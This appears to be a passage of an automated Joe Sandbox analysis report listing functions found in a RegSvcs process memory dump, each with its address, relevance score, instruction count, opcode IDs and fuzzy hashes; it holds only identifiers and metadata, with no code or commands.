                                                        Function 0169E1D0 Relevance: .1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bc0131e0e2fa1b4c7a1be9584749a12cd38fce75c68bc95a5c60efb2d84a45a2
                                                        • Instruction ID: 33439ecc6663618f2f242490c3657edf40226af28d1b20243128d9ebff8a3592
                                                        • Opcode Fuzzy Hash: bc0131e0e2fa1b4c7a1be9584749a12cd38fce75c68bc95a5c60efb2d84a45a2
                                                        • Instruction Fuzzy Hash: E711AD32241641EFDB15EF19CD90F16BBB9FF58B44F2000A9F9059B661C336ED01CA94
                                                        Function 01626259 Relevance: .1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d41e300aff6ba72f0c5bf6c6e6c19ebe9ebc5865c064a27dc275f26db38ac285
                                                        • Instruction ID: 301df78779f7e555342fb49b0086fa417c56455ab81b2f4cd65e687ad9f07f5b
                                                        • Opcode Fuzzy Hash: d41e300aff6ba72f0c5bf6c6e6c19ebe9ebc5865c064a27dc275f26db38ac285
                                                        • Instruction Fuzzy Hash: 1311C270502229ABDB25EF28CC51FE87379FF04714F5081D8A718A61E0D7709E81CF88
                                                        Function 016A6050 Relevance: .0, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 450e5137e5c1d82b8166378f0406980dc34af4d7f0f56dd2f3273925dd5dc809
                                                        • Instruction ID: 19aae316fc665b2dec3608e027daaedb4738e8d93d19a389f55f1ae6bfd235c8
                                                        • Opcode Fuzzy Hash: 450e5137e5c1d82b8166378f0406980dc34af4d7f0f56dd2f3273925dd5dc809
                                                        • Instruction Fuzzy Hash: D5112973900119ABCB15DB98CC80DDFBB7DEF48258F044166E906E7211EA34EA55CBE0
                                                        Function 0162208A Relevance: .0, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                        • Instruction ID: cce6d9155c1fb802c17a5b07d6f950e247d51d3b9a9a1b33b884630d857824fd
                                                        • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                        • Instruction Fuzzy Hash: 7101F1326005208BEF118A6DDC90EA2776BBFC4600F1540ADEE158F346DB758C81CBA0
                                                        Function 016B6500 Relevance: .0, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 25739f8b2efa938a31f3d5ee8c93a5b808291cc3c0c5e5b9d3f16c2ef711e10e
                                                        • Instruction ID: caf41215a902f47478259165faf324d6ce1b88595b963b953e4a406e2aeeb364
                                                        • Opcode Fuzzy Hash: 25739f8b2efa938a31f3d5ee8c93a5b808291cc3c0c5e5b9d3f16c2ef711e10e
                                                        • Instruction Fuzzy Hash: 4611A1326441469FD711CF58D880BE6BBB9FB9A314F08C159E8498B316D732EC91CBA0
                                                        Function 016AC810 Relevance: .0, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7ff033d6aa87b79a51fd6c82e8732e60ed7a137010d3a327b4abb76fd20c1f27
                                                        • Instruction ID: 64cd7ad88e6e38261f5b1c6dab01828e5b1d1f0e16a0ecaee0ee9c28f2c12f2a
                                                        • Opcode Fuzzy Hash: 7ff033d6aa87b79a51fd6c82e8732e60ed7a137010d3a327b4abb76fd20c1f27
                                                        • Instruction Fuzzy Hash: A11118B1E002099BCB00DFA9D941AAEBBF8FF58250F10806AA905E7351D674EE01CBA4
                                                        Function 016CEA60 Relevance: .0, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f0bde2da9e81ff720ad2cd43ffd38af151228b4b1fb3459d1e74d8b718c07a12
                                                        • Instruction ID: 1276ee9b32b09b234c5ea0984c6bd76d3f729567479239ff0e2ae3b600624718
                                                        • Opcode Fuzzy Hash: f0bde2da9e81ff720ad2cd43ffd38af151228b4b1fb3459d1e74d8b718c07a12
                                                        • Instruction Fuzzy Hash: 7B01B1321402119FCB32AF5D8C50936BFBAFF91E60B04442EE9555B351CB229C41CB91
                                                        Function 0161C020 Relevance: .0, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                        • Instruction ID: c8ae59a2e3330cbdaebd2db0c1d0df4dadfeb78a768ff84ee3cca20133c20b33
                                                        • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                        • Instruction Fuzzy Hash: 0B01D8322007459FEB2296A9DD40EAB77EAFFD6654F04881DAA468BA40DF75E402CB50
                                                        Function 016620F0 Relevance: .0, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5bbe746b04433f27a0e62c13e13c129acca2cb7560cfe223e013227814c0c229
                                                        • Instruction ID: 42d2a0bf636fec1f724514a734cc1113647a3cc7639d6cead0f459e5880344a8
                                                        • Opcode Fuzzy Hash: 5bbe746b04433f27a0e62c13e13c129acca2cb7560cfe223e013227814c0c229
                                                        • Instruction Fuzzy Hash: 93116D75A0020DEBCF05DFA8CC50BAEBBBAEB45284F00405DEA0197350DB35AE11CB90
                                                        Function 0165E5CF Relevance: .0, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3015513d1740b90757675114a6ec656c1a73f68736e8696c981add9ad6709da9
                                                        • Instruction ID: 665d4a6b2a12c6fea47ee7c81800b534a44671e96fc7c822b5dc9f5ebf44fad1
                                                        • Opcode Fuzzy Hash: 3015513d1740b90757675114a6ec656c1a73f68736e8696c981add9ad6709da9
                                                        • Instruction Fuzzy Hash: F501DFB2241A02BBD711AB2ECD80E53BBADFB986A4B00062DB50583651DB24FC11C6A8
                                                        Function 016B69C0 Relevance: .0, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a5db5d953a30f1fa4aabc89135aac3a1579a3dd3778e654a151b1af0896c91ef
                                                        • Instruction ID: da05d66013301281500a154096af2cb92b6d1a7632a460e2634832906921ea50
                                                        • Opcode Fuzzy Hash: a5db5d953a30f1fa4aabc89135aac3a1579a3dd3778e654a151b1af0896c91ef
                                                        • Instruction Fuzzy Hash: AC01FC322142169BD720DF6EDCC89A7FBACFF99660F114129ED5987380E7309951C7D1
                                                        Function 016AC460 Relevance: .0, Instructions: 48COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e4471af0b228601dd5c692aa3da2b804a5c66915acfa3c4e312a3ade66f64a68
                                                        • Instruction ID: 48712c5e68e7acd30d474e36a09de374c681dfc0ffa0f8aaba9450178db85566
                                                        • Opcode Fuzzy Hash: e4471af0b228601dd5c692aa3da2b804a5c66915acfa3c4e312a3ade66f64a68
                                                        • Instruction Fuzzy Hash: B3111B75A01209ABDF15EF68DC44EAE7BBAEB59250F004059F90197350DB35ED11CB94
                                                        Function 016AC97C Relevance: .0, Instructions: 48COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 86f7b38a57f4a184c7f0bb99e314476d7b3c2898f265e027596481611efdd0b7
                                                        • Instruction ID: ed5d4facae18dc832ea2994d9dc17876a638d5fb3487bcd7ff35e2b76ed9c648
                                                        • Opcode Fuzzy Hash: 86f7b38a57f4a184c7f0bb99e314476d7b3c2898f265e027596481611efdd0b7
                                                        • Instruction Fuzzy Hash: 3B1139B16183099FC700DF69D841A5BBBF8FF99710F40851EB998D7391E630E901CB96
                                                        Function 016ACA11 Relevance: .0, Instructions: 48COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 59a7415a9010eb528870c5290d7a3426876d36c41de2717091c59f94f32533c2
                                                        • Instruction ID: b39549688666d0033fc1cc83c64838a8c2538078e905e2f558945dfe86a2340e
                                                        • Opcode Fuzzy Hash: 59a7415a9010eb528870c5290d7a3426876d36c41de2717091c59f94f32533c2
                                                        • Instruction Fuzzy Hash: C41179B16083089FC300DF69D841A5BBBF8FF99350F00851EBA58D73A4E630E900CB96
                                                        Function 0163E016 Relevance: .0, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                        • Instruction ID: c07f760d013db8ef19a0f55a4e0c07d21e75efa0dac933b5c81db8c0918cbb7e
                                                        • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                        • Instruction Fuzzy Hash: F1018B32200680DFE322871DCE48F26BBE8EF94764F0904A6F905CB7A1D739DC41CA25
                                                        Function 0161826B Relevance: .0, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d82b15eb158864e2d77919290c66ea35952b4d2d4274be3933def68cbdba649d
                                                        • Instruction ID: 4bf0eaa01db59bb89fb5cf032c8b000cd76ec207405d0ee1a80035a785ef81a8
                                                        • Opcode Fuzzy Hash: d82b15eb158864e2d77919290c66ea35952b4d2d4274be3933def68cbdba649d
                                                        • Instruction Fuzzy Hash: 36018F317105059BD715EF69DC109AABBAEFF81620F5980699A01A7798EE20DD02C694
                                                        Function 016CEB50 Relevance: .0, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: b2ecd00c2dc56ea74dd17eff94e079f6a7a7b4fad22f08866898d0bc11df1a33
                                                        • Instruction ID: 85ab2c29366ef9096b33c0c37ed1564dc6f88a5422bb9dca5e0890dca5fb8621
                                                        • Opcode Fuzzy Hash: b2ecd00c2dc56ea74dd17eff94e079f6a7a7b4fad22f08866898d0bc11df1a33
                                                        • Instruction Fuzzy Hash: 2D018FB1284601AFD3315B19DD50B22BAB9EF95F60F05442EB2169B390D7B1A8418B68
                                                        Function 01622582 Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 025dbcc6e91b5d88cc4667d576eb0dff0684e1d1138346ce9b348d1fb6c084d2
                                                        • Instruction ID: 5a67bd4cf47d0f0547f85042cb5d512d6d4cce957957015ce90813fffe27bd57
                                                        • Opcode Fuzzy Hash: 025dbcc6e91b5d88cc4667d576eb0dff0684e1d1138346ce9b348d1fb6c084d2
                                                        • Instruction Fuzzy Hash: 65F0A433A41B21B7C7319B5A8D50F57BAAAEBC4B90F15842DE606A7740DA34ED01CAA0
                                                        Function 0164C073 Relevance: .0, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                        • Instruction ID: 6e88c0e01b46e890c05b090dd98b440f11268dad550fd637c3b3b19c44a3585a
                                                        • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                        • Instruction Fuzzy Hash: 92F062B2601615ABD328CF4DDC40E57FBEEDBD5A90F05812DA555D7320EA31DD05CBA0
                                                        Function 016F634F Relevance: .0, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a754ad86a7b7228dac79a62fad5b118a81e54a2522501f8832f492284a7b551d
                                                        • Instruction ID: 5c062f96e283f9ceb12ce10ba2cdb825ab6ee17d45f382049c5675fa73bfe1b2
                                                        • Opcode Fuzzy Hash: a754ad86a7b7228dac79a62fad5b118a81e54a2522501f8832f492284a7b551d
                                                        • Instruction Fuzzy Hash: 38012176A10209ABDB04DFA9D951A9EB7F8FF58704F10405AE904E7350D6749A018BA4
                                                        Function 0161C310 Relevance: .0, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                        • Instruction ID: 20e5c249db115cf97c134ee0d0eb5f6dca3ae0c6010ea47362951b4820ff6788
                                                        • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                        • Instruction Fuzzy Hash: D1F02B33284A339BD7325A9D4C40B2FAA9A9FD1B64F1E0039F2099B74CCA658D0397D0
                                                        Function 016F625D Relevance: .0, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4192285dea0a92dac813158ed676254244fc85c411f82acb43d2eb4578afeb8e
                                                        • Instruction ID: 89fd39f42cdf809fa47def846fa389f30da4bb84228c50cd083b39c6618ddd1d
                                                        • Opcode Fuzzy Hash: 4192285dea0a92dac813158ed676254244fc85c411f82acb43d2eb4578afeb8e
                                                        • Instruction Fuzzy Hash: 40014475A10209EFCB04DFA9D951AAEB7F9FF58304F10805AF904E7351D674AE01CBA4
                                                        Function 016F62D6 Relevance: .0, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a7d360a58d26b206584a9361827ac99da1857a0cacc1a07ca14397588a462b85
                                                        • Instruction ID: 68a54f6a9c0fe3ea2447e96272ee55590975c57ecaa057428bdeca458c42af73
                                                        • Opcode Fuzzy Hash: a7d360a58d26b206584a9361827ac99da1857a0cacc1a07ca14397588a462b85
                                                        • Instruction Fuzzy Hash: C6014471A00209EFDB04DFA9D945A9EB7F8FF58304F50405AFA14E7350D6749D01CBA4
                                                        Function 0165CA6F Relevance: .0, Instructions: 42COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                        • Instruction ID: b877054225ef4e3350f45bcc1562641029af9934b5ce7729de936fe31b072a35
                                                        • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                        • Instruction Fuzzy Hash: 4701D1322016899BE722971DCD09F59BF9DEF82B50F0840A9FE04CB7A1D77AC801C614
                                                        Function 016F61E5 Relevance: .0, Instructions: 41COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b627fec25eb6c257f11bb661ccd3427e14fda07872aab31bb01d22e531437400
                                                        • Instruction ID: ab05798bc39431e93aed1aa5a08349eb7750dde63312b09564f159c227f0e74c
                                                        • Opcode Fuzzy Hash: b627fec25eb6c257f11bb661ccd3427e14fda07872aab31bb01d22e531437400
                                                        • Instruction Fuzzy Hash: EC014F71A002499BDB04DFA9D945AEEBBF8FF59310F14405EE505E7380D774EA01CB98
                                                        Function 016A63C0 Relevance: .0, Instructions: 41COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                        • Instruction ID: ab26306ed7abc651caa3486531b9fbdb3f63f89b3d691d0ae7b1c26bf4fdd2a0
                                                        • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                        • Instruction Fuzzy Hash: 63F01D7220001EBFEF019F94DD80DAF7B7EEB59298B144129FA1192160D635DD21ABA0
                                                        Function 016AA4B0 Relevance: .0, Instructions: 40COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a97a19f1e511e6cac47997f9e3e7c49fcdf049b4e51916ca43bc9068e806d256
                                                        • Instruction ID: 7a96578ee20f513b93201952295299f1c8610d7e4bf7d31fecfe129c23fc849b
                                                        • Opcode Fuzzy Hash: a97a19f1e511e6cac47997f9e3e7c49fcdf049b4e51916ca43bc9068e806d256
                                                        • Instruction Fuzzy Hash: 41018536100209ABCF229E88DC40EDA3F66FB4C664F068106FE1866220C332D971EF81
                                                        Function 0161C0F0 Relevance: .0, Instructions: 39COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4d5211fa5dbed6554b29c64cfdf4c556343e15259fa8762b85e5fdb01b01f988
                                                        • Instruction ID: ede7ed8462e34303b96b5b381ac32028d9346f49bbb73c373df0cc580f1066d2
                                                        • Opcode Fuzzy Hash: 4d5211fa5dbed6554b29c64cfdf4c556343e15259fa8762b85e5fdb01b01f988
                                                        • Instruction Fuzzy Hash: 13F024712C42415BF310962D8C12F2632E6F7D4662F69842EEB058F3C5EA70DC0183A4
                                                        Function 0165656A Relevance: .0, Instructions: 39COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dd8c275911cada6874f0d7bc4020c47943611fadd754df09e79c65f5c80e9089
                                                        • Instruction ID: fa091f8a5dd776bde04385ee24cd51de919a09430703540afb45468368ef0dee
                                                        • Opcode Fuzzy Hash: dd8c275911cada6874f0d7bc4020c47943611fadd754df09e79c65f5c80e9089
                                                        • Instruction Fuzzy Hash: 3401AF702406819BE7669B3CCE58B2537A9BB81B48F984194BE41CBBE6DB28D842C614
                                                        Function 016C437C Relevance: .0, Instructions: 37COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                        • Instruction ID: c1ca94ce74311bf3f10d901a67da3aed31de444ff8f4bc22200474c277e1101e
                                                        • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                        • Instruction Fuzzy Hash: 26F0893574192347EB75FA2F9C30B3EAA56DFD0E51B15062C9559CB780DF60DC018794
                                                        Function 016AE872 Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                        • Instruction ID: 08d0dc6a507cf316ec65b43cebbc3d2ad2e613624d2d7dc1e1e8c8d378320bc9
                                                        • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                        • Instruction Fuzzy Hash: 35F089337515119BD3319A4DCC80F16B769EFD5A60F9B0169A6049B360C765EC02CFD0
                                                        Function 016AC89D Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ba071a6a2772f469a778141787e08d1b2fe150a32fc305c82af0806e5eafa3c6
                                                        • Instruction ID: c55d5164d93735a7c0db3d2e8082938231a5e3a3e25c2a7cf69cf00438b71716
                                                        • Opcode Fuzzy Hash: ba071a6a2772f469a778141787e08d1b2fe150a32fc305c82af0806e5eafa3c6
                                                        • Instruction Fuzzy Hash: 8EF0C2716093049FC310EF28C945A1BBBE4FF99710F80465EB898DB394EA34ED01CB96
                                                        Function 01650854 Relevance: .0, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
